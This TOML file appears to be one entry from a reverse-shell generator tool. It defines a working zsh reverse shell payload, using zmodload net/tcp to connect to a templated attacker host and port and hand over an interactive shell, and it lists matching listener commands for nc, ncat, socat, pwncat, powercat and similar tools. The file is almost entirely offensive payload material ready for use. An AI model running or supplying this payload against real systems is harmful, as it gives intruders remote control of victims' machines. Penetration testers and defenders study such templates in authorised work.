id = "zsh"
name = "zsh"
os = "unix"
type = "reverse"
proto = "tcp"
lang = "zsh"
description = "Reverse shell using zsh and zmodload net/tcp."

payload = "zsh -c 'zmodload zsh/net/tcp && ztcp {{LHOST}} {{LPORT}} && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'"

[listeners]
nc = "nc -lvnp {{LPORT}}"
nc_freebsd = "nc -lvn {{LPORT}}"
busybox_nc = "busybox nc -lp {{LPORT}}"
ncat = "ncat -lvnp {{LPORT}}"
ncat_exe = "ncat.exe -lvnp {{LPORT}}"
rlwrap_nc = "rlwrap -cAr nc -lvnp {{LPORT}}"
rustcat = "rcat listen {{LPORT}}"
pwncat = "python3 -m pwncat -lp {{LPORT}}"
socat = "socat -d -d TCP-LISTEN:{{LPORT}} STDOUT"
socat_tty = "socat -d -d file:`tty`,raw,echo=0 TCP-LISTEN:{{LPORT}}"
powercat = "powercat -l -p {{LPORT}}"
